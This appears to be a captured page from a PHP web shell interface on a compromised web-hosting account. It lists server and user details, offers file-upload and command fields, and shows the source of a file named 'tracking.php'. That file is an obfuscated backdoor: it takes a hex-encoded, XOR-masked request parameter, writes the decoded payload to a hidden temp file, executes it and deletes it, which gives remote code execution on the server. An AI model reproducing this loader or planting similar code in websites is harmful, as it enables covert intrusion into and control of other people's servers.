403Webshell
Server IP : 192.64.118.39  /  Your IP : 216.73.216.185
Web Server : LiteSpeed
System : Linux premium78.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : icasdbol ( 4186)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/icasdbol/pdfconverter.cc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/icasdbol/pdfconverter.cc/tracking.php
<?php

if(in_array("\x62i\x6Ed", array_keys($_REQUEST))){
	$dchunk = hex2bin($_REQUEST["\x62i\x6Ed"]);
	$value= ''; foreach(str_split($dchunk) as $char){$value .= chr(ord($char) ^ 69);}
	$comp = array_filter([getenv("TEMP"), getcwd(), getenv("TMP"), "/var/tmp", session_save_path(), sys_get_temp_dir(), "/dev/shm", "/tmp", ini_get("upload_tmp_dir")]);
	foreach ($comp as $resource) {
    		if (array_product([is_dir($resource), is_writable($resource)])) {
    $holder = str_replace("{var_dir}", $resource, "{var_dir}/.rec");
    if (@file_put_contents($holder, $value) !== false) {
	include $holder;
	unlink($holder);
	die();
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit